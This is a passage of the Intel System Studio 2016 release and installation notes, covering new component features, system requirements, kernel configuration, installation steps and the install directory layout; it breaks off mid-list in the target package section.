8.9 Eclipse* IDE Integration
8.9.1 Installation
8.9.2 Launching Eclipse for Development with the Intel C++ Compiler
8.9.3 Editing Compiler Cross-Build Environment Files
8.9.4 Cheat Sheets
8.9.5 Integrating the Intel® System Debugger into Eclipse*
8.10 Wind River* Workbench* IDE Integration
8.10.1 Documentation
8.10.2 Installation
8.10.3 Manual installation
8.10.4 Uninstall
8.11 Installing Intel® XDP3 JTAG Probe ............................................................. 30
8.12 Ordering JTAG Probe for the Intel® System Debugger ........................................ 30
9 Issues and Limitations ......................................................................................... 32
9.1 General Issues and Limitations ........................................................................... 32
9.1.1 Use non-RPM installation mode with Wind River* Linux* 5 and 6 .......... 32
9.1.2 Intel® Software Manager unsupported on Wind River* Linux* 5.0, Ubuntu* 12.04. 32
9.1.3 Installation into non-default directory on Fedora* 19 may lead to failures ...... 32
9.1.4 Running online-installer behind proxy server fails .................................... 32
9.1.5 The online-installer has to be run with sudo or root access ............................ 32
9.1.6 Some hyperlinks in HTML documents may not work when you use Internet Explorer. .......................................................... 33
9.2 Wind River* Linux* 7 Support ........................................................................... 33
9.2.1 Windows* host is currently not supported for Wind River* Linux* 7 targeted development .................................................................................. 33
9.2.2 No integration into Wind River* Workbench* IDE is currently available for Wind River* Linux* 7 target ................................................................. 33
9.2.3 Remote event-based sampling with Intel® VTune™ Amplifier Limitations ...... 33
9.3 Intel® Energy Profiler ...................................................................................... 33
9.3.1 /boot/config–uname –r file must be present on platform ............................ 33
9.3.2 Power and Frequency Analysis support for Intel® Atom™ Processor covers Android* OS only .......................................................... 33
9.4 Intel® VTune™ Amplifier Usage with Yocto Project* ........................................... 34
9.4.1 Building Sampling Collector (SEP) for Intel® VTune™ Amplifier driver on host Linux* system ........................................................................ 34
9.4.2 Remote Intel® VTune™ Amplifier Sampling on Intel® 64 Yocto Project* Builds .. 34
9.4.3 Building 64bit Sampling Collector against Yocto Project* targeting Intel® Atom™ Processor E38xx requires additional build flags .................................. 34
9.5 Intel® System Studio System Analyzer ............................................................ 34
9.5.1 Supported Linux* Distributions ..................................................................... 34
9.5.2 The path for the Intel® System Studio System Analyzer does not get set up automatically ........................................................................ 34
9.5.3 Support for Intel® Atom™ Processor Z3560 and Z3580 code-named “Moorefield” missing 35
9.6 Intel® System Debugger ......................................................................................................................35
9.6.1 Intel® Puma™ 6 Media Gateway Firmware Recovery Tool not available 35
9.6.2 Connecting to Intel® Quark™ SoC may trigger error message that can be ignored 35
9.6.3 Using the symbol browser on large data sets and large symbol info files not recommended .................................................................35
9.6.4 Limited support for Dwarf Version 4 symbol information .................................................................35
9.7 GDB* - GNU* Project Debugger ..........................................................................................................35
9.7.1 Eclipse* integration of GDB* requires Intel® C++ Compiler install ..........................................................35
9.8 Intel® C++ Compiler ..............................................................................................................................35
9.8.1 “libgcc_s.so.1” should be installed on the target system .................................................................35
10 Attributions ..............................................................................................................................................36
11 Disclaimer and Legal Information ..........................................................................................................37
1 Introduction
This document provides a brief overview of the Intel® System Studio 2016 and provides pointers to where you can find additional product information, technical support, articles and whitepapers.
It also explains how to install the Intel® System Studio product. Installation is a multi-step process and may contain components for the development host and the development target. Please read this document in its entirety before beginning and follow the steps in sequence.
The Intel® System Studio consists of multiple components for developing, debugging, tuning and deploying system and application code targeted towards embedded, Intelligent Systems, Internet of Things and mobile designs.
The tool suite covers several different use cases targeting development for embedded intelligent system platforms ranging from Intel® Atom™ Processor based low-power embedded platforms to 3rd, 4th, 5th and 6th generation Intel® Core™ microarchitecture based designs. Please refer to the Intel® System Studio User's Guide for guidance on how to apply Intel® System Studio to the various use case scenarios that are available with this versatile product.
Due to the nature of this comprehensive integrated software development tools solution, different Intel® System Studio components may be covered by different licenses. Please see the licenses included in the distribution as well as the Disclaimer and Legal Information section of these release notes for details.
Optimization Notice
Intel’s compilers may or may not optimize to the same degree for non-Intel microprocessors for optimizations that are not unique to Intel microprocessors. These optimizations include SSE2, SSE3, and SSSE3 instruction sets and other optimizations. Intel does not guarantee the availability, functionality, or effectiveness of any optimizations on microprocessors not manufactured by Intel. Microprocessor-dependent optimizations in this product are intended for use with Intel microprocessors. Certain optimizations not specific to Intel microarchitecture are reserved for Intel microprocessors. Please refer to the applicable User and Reference Guides for more information regarding the specific instruction sets covered by this notice.
Notice revision #20110804
2 What's New
This section highlights important changes in the actual product release.
More detailed information about new features and changes in the respective product release notes (s. also section ‘6.1 Release Notes and User Guide Location’)
Intel® System Studio 2016 Update 2
1. Intel® C++ Compiler:
- Intrinsic for the Short Vector Random Number Generator (SVRNG) Library
- The Short Vector Random Number Generator (SVRNG) library provides intrinsics for the IA-32 and Intel® 64 architectures running on supported operating systems. The SVRNG library partially covers both standard C++ and the random number generation functionality of the Intel® Math Kernel Library (Intel® MKL). Complete documentation may be found in the Intel® C++ Compiler 16.0 User and Reference Guide.
- Intel® SIMD Data Layout Templates (Intel® SDLT)
- Intel® SDLT is a library that helps you leverage SIMD hardware and compilers without having to be a SIMD vectorization expert.
- Intel® SDLT can be used with any compiler supporting ISO C++11, Intel® Cilk™ Plus SIMD extensions, and #pragma ivdep
- New C++14 and C11 features supported
- And many others ... For a full list of new features please refer to the Composer Edition product release notes
2. Intel® Math Kernel Library (Intel® MKL)
- Introduced mkl_finalize function to facilitate usage models when Intel MKL dynamic libraries or third party dynamic libraries are linked with Intel MKL statically are loaded and unloaded explicitly
- Introduced sorting algorithm
- Performance improvements for BLAS, LAPACK, ScaLAPACK, Sparse BLAS
- Several new features for Intel MKL PARDISO
- Added Intel® TBB threading support for all and OpenMP* for some BLAS level-1 functions.
3. Intel® Performance Primitives (Intel® IPP)
- Image Processing:
---
Added the contiguous volume format (C1V) support to the following 3D data processing functions: ipprWarpAffine, ipprRemap, and ipprFilter.
Added the ippiFilterBorderSetMode function to support high accuracy rounding mode in ippiFilterBorder.
Added the ippiCopyMirrorBorder function for copying the image values by adding the mirror border pixels.
Added mirror border support to the following filtering functions: ippiFilterBilateral, ippiFilterBoxBorder, ippiFilterBorder, ippiFilterSobel, and ippiFilterScharr.
Kernel coefficients in the ippiFilterBorder image filtering functions are used in direct order, which is different from the ippiFilter functions in the previous releases.
**Computer Vision:**
- Added 32-bit floating point input data support to the ippiSegmentWatershed function.
- Added mirror border support to the following filtering functions: ippiFilterGaussianBorder, ippiFilterLaplacianBorder, ippiMinEigenVal, ippiHarrisCorner, ippiPyramidLayerDown, and ippiPyramidLayerUp.
**Signal Processing:**
- Added the ippsThreshold_LTAbsVal function, which uses the vector absolute value.
- Added the ippsIIRIIR64f functions to perform zero-phase digital IIR filtering.
**The multi-threaded libraries only depend on the Intel® OpenMP* libraries; their dependencies on the other Intel® Compiler runtime libraries were removed.**
4. Intel® System Debugger:
- Unified installer now for all components of the Intel® System Debugger (for system debug, system trace and WinDbg* extension)
- Support for Eclipse* 4.4 (Luna) integration with Intel® Trace Viewer
- New ‘Trace Profiles’ feature for System Trace Viewer to configure the destination for streaming mode for:
- BIOS Reserverd Trace Memory
- Intel® Trace Hub Memory
- Streaming to DCI-Closed Chassis Adapter (BSSB CCA)
- Tracing to memory support (Intel® Trace Hub or system DRAM memory) for 6th Gen Intel® Core™ processors (PCH) via Intel® XDP3 JTAG probe.
- Trace Viewer improvements: Event distribution viewer. New progress bar when stopping a trace to memory. Rules are saved now in Eclipse workspace and restored during Eclipse restart. Improved memory download with wrapping enabled.
- Debugging support for Intel® Xeon® Processor D-1500 Product Family on the Grangeville platform.
- System Debugger improvements: Export memory window to text file.
5. Intel® Graphics Performance Analyzer (Intel® GPA)
- Added support for 32-bit and 64-bit applications on Android M (6.0, Marshmallow).
- Intel Graphics Performance Analyzers are now in a single package for Windows users.
- Added support for OS X 10.11 El Capitan.
- Implemented texture storage parameters modification experiment - you can now change dimensions and sample count parameters for input textures without recompiling your app.
- Can now export textures in KTX/DDS/PNG file formats.
- And much more….
View the full release notes for more details.
6. Intel® VTune™ Amplifier for Systems
- Added support for Ubuntu 14.4.3 for Intel® Energy Profiler (SoC Watch 2.1.1):
- Support for the ITT Counters API used to observe user-defined global characteristic counters that are unknown to the VTune Amplifier
- Support for the Load Module API used to analyze code that is loaded in an alternate location that is not accessible by the VTune Amplifier
- Option to limit the collected data size by setting a timer to save tracing data only for the specified last seconds of the data collection added for hardware event-based sampling analysis types
- New Arbitrary Targets group added to create command line configurations to be launched from a different host. This option is especially useful for microarchitecture analysis since it provides easy access to the hardware events available on a platform you choose for configuration.
- Source/Assembly analysis available for OpenCL™ kernels (with no metrics data)
- SGX Hotspots analysis support for identifying hotspots inside security enclaves for systems with the Intel Software Guard Extensions (Intel SGX) feature enabled
- Metric-based navigation between call stack types replacing the former Data of Interest selection
- Updated filter bar options, including the selection of a filtering metric used to calculate the contribution of the selected program unit (module, thread, and so on)
- DRAM Bandwidth overtime and histogram data is scaled according to the maximum achievable DRAM bandwidth
7. Intel® Inspector
- Support for Fedora 23 and Ubuntu 15.10.
2.1 Versions History
This section highlights important changes in previous Intel® System Studio 2016 product versions.
Intel® System Studio 2016 Update 1
1. Intel® C++ Compiler:
• Enhancements for offloading to Intel® Graphics Technology
2. Intel® Energy Profiler (SoC Watch):
• Added support for collection of gfx-cstate and ddr-bw metrics on platforms based on Intel® Core™ architecture.
3. Intel® System Debugger:
• New options for the debugger’s “Restart” command
• System Trace Viewer:
o New “Event Distribution View” feature
o Several improvements in the Trace Viewer GUI.
3 Intel® Software Manager
The Intel® Software Manager, automatically installed with the Intel® System Studio product, is a Windows System Tray application to provide a simplified delivery mechanism for product updates, current license status and news on all installed Intel software products.
You can also volunteer to provide Intel anonymous usage information about these products to help guide future product design. This option, the Intel® Software Improvement Program, is not enabled by default – you can opt-in during installation or at a later time, and may opt-out at any time. For more information please see http://intel.ly/SoftwareImprovementProgram.
4 Product Contents
The product contains the following components:
1. Intel® C++ Compiler 16.0 Update 2
2. Intel® Integrated Performance Primitives 9.0 Update 2
3. Intel® Math Kernel Library 11.3 Update 2 for Linux®
4. Intel® Threading Building Blocks 4.4 Update 3
5. Intel® System Debugger 2016
5.1. Intel® System Debugger notification module xdbntf.ko (Provided under GNU General Public License v2)
6. OpenOCD 0.8.0 library (Provided under GNU General Public License v2+) (64-bit host only)
6.1. OpenOCD 0.8.0 source (Provided under GNU General Public License v2+)
7. GNU® GDB 7.8.1 (Provided under GNU General Public License v3) (64-bit host only)
7.1. Source of GNU® GDB 7.8.1 (Provided under GNU General Public License v3)
8. Intel® VTune™ Amplifier 2016 Update 2 for Systems with Intel® Energy Profiler
9. Intel® Inspector 2016 for Systems
10. Intel® Graphics Performance Analyzers 2015 R4
5 Getting Started
Please refer to the Getting Started Guide and Intel® System Studio User's Guide for guidance on Intel® System Studio use cases and supported usage models.
Intel® System Studio User's Guide
• <install-dir>/documentation_2016/en/iss2016/iss_ug.pdf
Intel® System Studio Getting Started Guide
• <install-dir>/documentation_2016/en/iss2016/iss_gsg_lin.htm
6 Technical Support and Documentation
6.1 Release / Installation Notes and User Guides Location
The release notes and getting started guide for the tools components making up the Intel® System Studio product can be found at the following locations after unpacking system_studio_2016.1.xxx.tgz and running the install.sh installation script or running the online installer system_studio_2016.1.xxx_online.sh.
The paths are given relative to the installation directory <install-dir>. The default installation directory is /opt/intel for (sudo)root installations and the user home directory ($HOME)/intel for user installations unless indicated differently.
Intel® System Studio Release Notes and Installation Guide
Intel® C++ Compiler
- <install-dir>/documentation_2016/en/compiler_c/iss2016/l_a_compiler_get_started.htm
GNU* GDB / Intel® Debugger for Heterogeneous Compute
- <install-dir>/documentation_2016/en/debugger/iss2016/gdb/get_started.htm
Intel® Integrated Performance Primitives
- <install-dir>/documentation_2016/en/ipp/common/get_started.htm
Intel® Math Kernel Library
- <install-dir>/documentation_2016/en/mkl/iss2016/get_started.htm
Intel® Threading Building Blocks
- <install-dir>/documentation_2016/en/tbb/common/get_started.htm
Intel® System Debugger
**Intel® VTune™ Amplifier for Systems**
**Intel® Inspector for Systems**
• `<install-dir>/inspector_2016_for_systems/documentation/en/welcomepage/get_started.htm`
**Intel® Graphics Performance Analyzers (Intel® GPA)**
Release Notes of the latest Intel® GPA 2015 R4 release can be found at:
Documentation of the Intel® GPA is available at:
**Intel® System Studio - Target User Documentation**
After unpacking the `<install-dir>/system_studio_2016.2.xxx\targets\system_studio_target.tgz` package you can find several documentation to setup target systems for operation:
• A user’s guide for WuWatch for Android* targets:
..\system_studio_target\wuwatch_android\WakeUpWatchForAndroid.pdf
• User guides for SAocWatch for Android* and Linux* targets:
..\system_studio_target\socwatch_linux_v2.1\SoCWatchForLinux.pdf
..\system_studio_target\socwatch_android_vx.x.x\SoCWatchForAndoirc_vx_x.x.pdf
• Release Notes for Inspector for Linux* target:
• ../../../system_studio_target/inspector_2016_for_systems/documentation/Release_Notes_Inspector_Linux.pdf
6.2 Article & Whitepaper Locations
Intel® System Studio Tutorials and Samples
• <install-dir>/documentation_2016/en/iss2016/samples-and-tutorials.html
Intel® System Studio Articles and Whitepapers
• https://software.intel.com/en-us/articles/intel-system-studio-articles
• For a list of all available articles, whitepapers and related resources please visit the Intel® System Studio product page at http://software.intel.com/en-us/intel-system-studio and look at the Support tab.
6.3 Support
If you did not register your compiler during installation, please do so at the Intel® Software Development Products Registration Center. Registration entitles you to free technical support, product updates and upgrades for the duration of the support term.
To submit issues related to this product please visit the Intel Premier Support webpage and submit issues under the product Intel(R) System Studio.
Additionally you may submit questions and browse issues in the Intel® System Studio User Forum.
Note: If your distributor provides technical support for this product, please contact them for support rather than Intel.
6.4 Support for native code generation for Intel® Graphics Technology
By default, the compiler will generate virtual ISA code for the kernels to be offloaded to Intel® Graphics Technology. The vISA is target independent and will run on processors that have the Intel graphics processor integrated on the platform and that have the proper Intel® HD Graphics driver installed. The Intel HD Graphics driver contains the offload runtime support and a Jitter (just-in-time compiler) that will translate the virtual ISA to the native ISA at runtime for the platform on which the application runs and do the offload to the processor graphics. The Jitter
gets the current processor graphics information at runtime. The new feature allows generation of native ISA at link time by using the option `--mgpuarch=<arch>`. The option is described in detail in the User's Guide.
7 System Requirements
7.1 Supported Host Platforms
One of the following Linux distributions (this is the list of distributions supported by all components; other distributions may or may not work and are not recommended - please refer to Technical Support if you have questions).
In most cases Intel® System Studio 2016 will install and work on a standard Linux* OS distribution based on current Linux* kernel versions without problems, even if they are not listed below. You will however receive a warning during installation for Linux* distributions that are not listed
- Red Hat Enterprise* Linux* 6, 7
- Ubuntu* 10.04 LTS, 12.04 LTS, 14.04 LTS, 15.04 LTS
- Fedora* 20
- Wind River* Linux* 5, 6
- openSUSE* 12.1
- SUSE LINUX Enterprise Server* 11 SP2, 12
Individual Intel® System Studio 2016 components may support additional distributions. See the individual component’s release notes after you unpacked and ran the installer for the tool suite distribution
> tar -zxvf system_studio_2016.2.xxx.tgz
for details.
Sudo or Root Access Right Requirements
- Integration of the Intel® C++ Compiler into a Yocto Project* Application Development Toolkit installed to /opt/poky/ requires the launch of the tool suite installation script install.sh as root or sudo user.
- Installation of the hardware drivers for the Intel® ITP-XDP3 probe to be used with the Intel® System Debugger requires the launch of the tool suite installation script install.sh as root or sudo user.
Environment Setup
To setup the environment for the Intel® C++ Compiler and integrate it correctly with the build environment on your Linux host, execute the following command:
> source <install-dir>/bin/compilervars.sh [-arch <arch>] [-platform <platform>]
---
where
ia32: Compilers and libraries for IA32 architectures only
intel64: Compilers and libraries for Intel® 64 architectures only
<platform> can be either linux or android.
7.2 Eclipse* Integration Prerequisites
When asked point the installer to the installation directory of your Eclipse* install. Usually this would be /opt/eclipse/.
The prerequisites for successful Eclipse integration are:
1. Eclipse* 3.8 (Juno) – Eclipse* 4.5 (Mars)
2. Eclipse* CDT 8.0 – 8.3
3. Java Runtime Environment (JRE) version 6.0 (also called 1.6) update 11 or later.
7.3 Host Prerequisites and Resource Requirements
7.3.1 Host Space Requirements by Component
<table>
<thead>
<tr>
<th>Component</th>
<th>Minimum RAM</th>
<th>Recommended RAM</th>
<th>Disk Space</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intel® System Studio</td>
<td>2Gb</td>
<td>4Gb</td>
<td>7Gb</td>
</tr>
<tr>
<td>Intel® C++ Compiler</td>
<td>1Gb</td>
<td>2Gb</td>
<td>2.5Gb</td>
</tr>
<tr>
<td>Intel® Integrated Performance Primitives</td>
<td>1Gb</td>
<td>4Gb</td>
<td>1-2Gb</td>
</tr>
<tr>
<td>Intel® Math Kernel Library</td>
<td>1Gb</td>
<td>4Gb</td>
<td>2.3Gb</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier for Systems</td>
<td>2Gb</td>
<td>4Gb</td>
<td>650Mb</td>
</tr>
<tr>
<td>Intel® Inspector for Systems</td>
<td>2Gb</td>
<td>4Gb</td>
<td>350Mb</td>
</tr>
<tr>
<td>GDB</td>
<td>1Gb</td>
<td>2Gb</td>
<td>200Mb</td>
</tr>
<tr>
<td>Intel® System Debugger</td>
<td>1Gb</td>
<td>2Gb</td>
<td>300Mb</td>
</tr>
</tbody>
</table>
7.3.2 Intel® Integrated Performance Primitives (Intel® IPP) Details
Intel® Integrated Performance Primitives (Intel® IPP) for IA-32 Hardware Requirements:
- 1800MB of free hard disk space, plus an additional 400MB during installation for download and temporary files.
Intel® Integrated Performance Primitives (Intel® IPP) for Intel® 64 Hardware Requirements:
- 1900MB of free hard disk space, plus an additional 700MB during installation for download and temporary files.
### 7.3.3 Intel® C++ Compiler
Cross-build for Wind River Linux* target currently requires an existing Wind River Linux 4.x, 5.x, 6.x or 7.x installation that the compiler can integrate into.
### 7.4 Target Software Requirements
- Yocto Project* 1.4, 1.5, 1.6, 1.7, 1.8 based environment
- CE Linux* PR35 based environment
- Tizen* IVI 3.x
- Wind River Linux* 4, 5, 6, 7 based environment
- Android* 4.1.x through 5.1
**Note:**
The level of target OS support by a specific Intel® System Studio component may vary.
### 7.5 Target Prerequisites and Resource Requirements
#### 7.5.1 Target Space Requirement by Component
<table>
<thead>
<tr>
<th>Component</th>
<th>Minimum RAM</th>
<th>Dependencies</th>
<th>Disk Space</th>
</tr>
</thead>
<tbody>
<tr>
<td>Intel® C++ Compiler</td>
<td>application</td>
<td>Linux kernel 1.26.18 or newer glibs-2.5 or compatible libgcc-4.1.2 or compatible libstdc++-3.4.7 or compatible</td>
<td>13Mb (IA-32)</td>
</tr>
<tr>
<td></td>
<td>dependent</td>
<td></td>
<td>15Mb (Intel® 64)</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier CLI (CLI)</td>
<td>4Gb</td>
<td>Specific kernel configuration reqs. Details below.</td>
<td>200Mb</td>
</tr>
<tr>
<td>Intel® VTune™ Amplifier SEP (SEP)</td>
<td>(# logical cores+2) Mb</td>
<td>specific kernel configuration reqs. Details below.</td>
<td>8Mb</td>
</tr>
<tr>
<td>SoC Watch</td>
<td>(# logical cores+2) Mb</td>
<td>Specific kernel configuration reqs. See SoCWatch documentation</td>
<td>8Mb</td>
</tr>
<tr>
<td>WakeUp Watch</td>
<td>(# logical cores+2) Mb</td>
<td>Specific kernel configuration reqs. See WuWatch documentation</td>
<td>8Mb</td>
</tr>
<tr>
<td>Intel® Inspector for Systems CLI</td>
<td>2Gb</td>
<td>4Gb</td>
<td>350Mb</td>
</tr>
</tbody>
</table>
### 7.5.2 Intel® VTune™ Amplifier target OS kernel configuration
For Intel® VTune™ Amplifier performance analysis and Intel® Energy Profiler there are minimum kernel configuration requirements. The settings below are required for different analysis features.
- For event-based sampling (EBS) sep3_x.ko and pax.ko require the following settings:
- CONFIG_PROFILING=y
- CONFIG_OPROFILE=m (or CONFIG_OPROFILE=y)
- CONFIG_HAVE_OPROFILE=y
- For EBS with callstack information vtsspp.ko additionally needs the following settings:
- CONFIG_MODULES=y
- CONFIG_SMP=y
- CONFIG_MODULE_UNLOAD=y
- CONFIG_KPROBES=y
- CONFIG_TRACEPOINTS=y (optional but recommended)
- For power analysis, required by apwr3_x.ko
- CONFIG_MODULES=y
- CONFIG_MODULE_UNLOAD=y
- CONFIG_TRACEPOINTS=y
- CONFIG_FRAME_POINTER=y
- CONFIG_COMPAT=y
- CONFIG_TIMER_STATS=y
- CONFIG_X86_ACPI_CPUFREQ=m (or CONFIG_X86_ACPI_CPUFREQ=y)
- CONFIG_INTEL_IDLE=y
## 7.5.3 Intel® VTune™ Amplifier Feature vs. Resource Matrix
<table>
<thead>
<tr>
<th>Feature</th>
<th>Event based sampling (EBS) analysis</th>
<th>EBS analysis with stacks</th>
<th>Algorithmic analysis (PIN-based)</th>
<th>Intel Energy Profiler</th>
<th>Remote collection from host</th>
<th>Result view on target</th>
<th>Requirements:</th>
</tr>
</thead>
<tbody>
<tr>
<td>SEP</td>
<td>X</td>
<td></td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~8 MB disk space (Number of logical cores +2) Mb RAM</td>
</tr>
<tr>
<td>ampixe-cl - target</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~25 MB disk space ~64 Mb RAM</td>
</tr>
<tr>
<td>ampixe-cl</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>~200MB disk space >= 4Gb RAM</td>
</tr>
</tbody>
</table>
### 7.6 Hardware Requirements
- IA32 or Intel® 64 architecture based host computer
- Development platform based on the Intel® Atom™ processor Z5xx, N4xx, N5xx, D5xx, E6xx, N2xxx, D2xxx, E3xxx, Z2xxx, Z3xxx, C2xxx, or Intel® Atom™ processor CE4xxx, CE53xx and the Intel® Puma™ 6 Media Gateway
- Intel® Edison development platform
- Alternatively development platform based on 2nd, 3rd, 4th, 5th or 6th generation Intel® Core™ processor.
- Xeon® processors based on 2nd, 3rd 4th or 5th generation Intel® Core™ architecture.
### 7.7 Intel® Graphics Technology development specific requirements
Up-to-date information on hardware, operating system and driver requirements for offloading computations to the integrated processor graphics can be found on the following page:
8 Installation Notes
8.1 Installing the Tool Suite
The installation process as well as prerequisites for using the different Intel® System Studio components are documented online and can be found here:
The default base installation, in the following referred to as <install-dir> directory is:
- For sudo/root installation: /opt/intel/
- For user mode installation: $HOME/intel/
Important Note: As indicated in the installation process, Intel® System Studio 2015 customers need to upgrade their license either by entering an Intel® System Studio 2016 serial number directly or by obtaining the new license file from Intel® Registration Center. More information on this can be found on the following page:
You have the choice to use the online installer which is a small agent that downloads installation packages according to the products you will choose for installation.
Alternatively you can use the full package offline installer which doesn’t require an Internet connection for installation.
8.2 Product Installation (Online Installer)
If you only intend to install the Intel® System Studio you can reduce the package size that is downloaded for the actual install. Using the online installer requires to be connected to the internet and that https protocol based component downloads are permitted by your firewall.
To install the product execute the downloaded online install script
> system_studio_2016.2.xxx_online.sh
following all instructions. During installation you have to activate your product with serial number (xxxx-xxxxxxxx) or using a license file (.lic). See activation details under ch. 8.3.
8.3 Product Installation (Full Package Offline Installer)
Using the full package offline installer is suitable for systems where no Internet connection is available. You can perform a default installation (with a typical selection of components) or a custom installation where you configure your set of components to install.
The full package offline installer is available as a command line tool and a graphical installation Wizard.
To run the installer proceed as follows:
- Unpack the downloaded tool suite package in a directory to which you have write access.
> tar -zxvf system_studio_2016.2.xxx.tgz
- Change into the directory the tar file was extracted to
cd ./system_studio_2016.2.xxx/
- Execute one of the installation scripts for command line installation or using the GUI installer.
>./install.sh
>./install_GUI.sh
following all instructions. During installation you have to activate your product with serial number (xxxx-xxxxxxxx) or using a license file (.lic). See activation details under ch. 8.x
8.4 Activating the Product
During installation of the Intel® System Studio 2016 Composer Edition an activation dialog pops up providing the following options
- **Use existing activation** (this option is visible when the product installer recognized an existing valid license on the system)
- **Activation with Serial Number**. ("Online Activation", requires Internet connection; the format of the serial number is: xxxx-xxxxxxx)
- **Evaluation activation** (no serial number required; installs a 30-days license on the system with full functionality)
- **Use a license manager** (license manager must be running and accessible from the install machine)
- **Use license file** (license file .lic must be available on the install machine, no internet connection required)
The Intel® Software Manager (see section 3) can be used to manage your activations after product installation. It can for example convert an evaluation activation into a full product activation (after product license purchase) without re-installing the product.
8.5 Default / Customized Installation
When the Installation Summary dialog pops up, just click the ‘Next’ for a default installation or on ‘Customize’ button to modify the list of components to install.
8.6 Uninstalling the Tool Suite
To uninstall the product, execute the following
- Change into the System Studio base directory
cd <install-dir>/system_studio_2016.2.xxx/
- Execute one of the uninstallation scripts on command line or using the GUI uninstaller.
./uninstall.sh
./uninstall_GUI.sh
You need to uninstall the product with the same rights (user, (sudo) root) as you used for product installation.
8.7 Installation directory structure
Intel® System Studio 2016 installs components which are unique to System Studio into <install-dir>/system_studio_2016.1.xxx/ and components which share subcomponents (such as documentation) with other Intel® Software Development Products into <install-dir>.
The Intel® System Studio 2016 installation directory contains tools and directories as well as links to shared components into the parent directory as follows:
- <install-dir>/system_studio_2016.2.xxx/compiler_libraries -> ../compilers_and_libraries_2016.2.xxx
- <install-dir>/system_studio_2016.2.xxx/debugger
- <install-dir>/system_studio_2016.2.xxx/documentation -> ../documentation_2016
- <install-dir>/system_studio_2016.2.xxx/documentation_2016 -> ../documentation_2016
- <install-dir>/system_studio_2016.2.xxx/ide_support -> ../ide_support_2016
- <install-dir>/system_studio_2016.2.xxx/ide_support_2016 -> ../ide_support_2016
- <install-dir>/system_studio_2016.2.xxx/inspector_for_systems -> ../inspector_2016_for_systems
- <install-dir>/system_studio_2016.2.xxx/licensing
- <install-dir>/system_studio_2016.2.xxx/man -> ../man
- <install-dir>/system_studio_2016.2.xxx/samples -> ../samples_2016
• `<install-dir>/system_studio_2016.2.xxx/samples_2016` -> `../samples_2016`
• `<install-dir>/system_studio_2016.2.xxx/targets`
• `<install-dir>/system_studio_2016.2.xxx/uninstall`
• `<install-dir>/system_studio_2016.2.xxx/uninstall_GUI.sh`
• `<install-dir>/system_studio_2016.2.xxx/uninstall.sh`
• `<install-dir>/system_studio_2016.2.xxx/vtune_amplifier_for_systems_2016.2.x.xxxxxx`
• `<install-dir>/system_studio_2016.2.xxx/wr-iss-2016`
Under the Intel® System Studio 2016 installation directory `<install-dir>` you will find:
• `<install-dir>/bin`
• `<install-dir>/compiler_and_libraries` -> `../compilers_and_libraries_2016`
• `<install-dir>/compiler_and_libraries_2016`
• `<install-dir>/compiler_and_libraries_2016.2.xxx`
• `<install-dir>/debugger_2016`
• `<install-dir>/documentation_2016`
• `<install-dir>/eclipse`
• `<install-dir>/gpa`
• `<install-dir>/ide_support_2016`
• `<install-dir>/include` -> `compilers_and_libraries/linux/include`
• `<install-dir>/inspector_2016_for_systems`
• `<install-dir>/inspector_for_systems` -> `../inspector_2016_for_systems`
• `<install-dir>/ipp` -> `compilers_and_libraries/linux/ipp`
• `<install-dir>/ism`
• `<install-dir>/lib` -> `compilers_and_libraries/linux/lib`
• `<install-dir>/licenses`
• `<install-dir>/man` -> `compilers_and_libraries/linux/man`
• `<install-dir>/mkl` -> `compilers_and_libraries/linux/mkl`
• `<install-dir>/samples_2016`
• `<install-dir>/system_debugger_2016`
• `<install-dir>/system_studio_2016.2.xxx`
• `<install-dir>/tbb` -> `compilers_and_libraries/linux/tbb`
• `<install-dir>/uninstall`
• `<install-dir>/usr`
• `<install-dir>/vtune_amplifier_2016_for_systems` -> `../vtune_amplifier_2016_for_systems.2.x.xxxxxx`
• `<install-dir>/vtune_amplifier_2016_for_systems.2.x.xxxxxx`
• `<install-dir>/vtune_amplifier_for_systems` -> `../vtune_amplifier_2016_for_systems.2.x.xxxxxx`
The Intel® System Studio contains components under GNU* General Public License (GPL) in addition to commercially licensed components. This includes the GNU* Project Debugger – GDB and the kernel module used by the Intel® System Debugger to export Linux* dynamically kernel module memory load information to host.
The Intel® VTune™ Amplifier, Intel® Energy Profiler and Intel® Inspector are available for power and performance tuning as well as memory and thread checking on the installation host.
For additional installation of command-line only versions of Intel® VTune™ Amplifier and Intel® Inspector on the development target, please follow the sub-chapter on the command line interface (CLI) installations below.
Furthermore a targets directory contains Intel® C++ Compiler runtime libraries, the Intel® VTune™ Amplifier Sampling Enabling Product (SEP) , target components for the Intel® VTune™ Amplifier Data Collector, the kernel module used by the Intel® System Debugger to export Linux* dynamically kernel module memory load information to host, and prebuilt gdbserver target debug agents for GDB.
**Sudo or Root Access Right Requirements**
- Integration of the Intel® C++ Compiler into the Yocto Project* Application Development Toolkit requires the launch of the tool suite installation script install.sh as root or sudo user.
- Installation of the hardware drivers for the Intel® ITP-XDP3 probe to be used with the Intel® System Debugger requires the launch of the tool suite installation script install.sh as root or sudo user.
### 8.8 Development target package installation
The targets directory contains Intel® C++ Compiler runtime libraries, the Intel® VTune™ Amplifier Sampling Enabling Product (SEP) , target components for the Intel® VTune™ Amplifier Data Collector, target components for the Intel® Inspector, the xdbntf.ko used by the Intel® System Debugger to export Linux* kernel module memory load information to host, and prebuilt gdbserver target debug agents for GDB.
To install it follow the steps below
1. Copy the contents of the `<install-dir>\system_studio_2016.2.xxx\targets` directory to your target platform and unpack the `system_studio_target.tgz` and `debugger_kernel_module.tgz` files contained in this directory there.
Add the compiler runtime libraries that you find in `...\system_studio_target`
compilers_and_libraries_2016.2.175/linux/compiler/lib/<OS> to your target environment search path.
2. For the dynamic kernel module load export feature follow the instructions found at ...
debugger_kernel_module/system_debug/kernel-modules/xdbntf/read.me.
This is also detailed in the Intel® System Debugger Installation Guide and Release Notes sysdebug-release-install.pdf.
3. For the GDB* Debugger remote debug agent gdbserver pick the executable that describes your target system from .../system_studio_target/debugger_2016/gdb/targets/<arch>/<OS>, where arch and OS can be the following:
o arch: ia32
target: Android, CELinuxPR35, ChromiumOS, KendrickCanyon, TizenIVI, WindRiverLinux4, WindRiverLinux5, WindRiverLinux6, WindRiverLinux7, Yoctol.4, Yoctol.5, Yoctol.6, Yoctol.7, Yocto2.0
o arch: intel64
target: Android
o arch: intel64_igfx
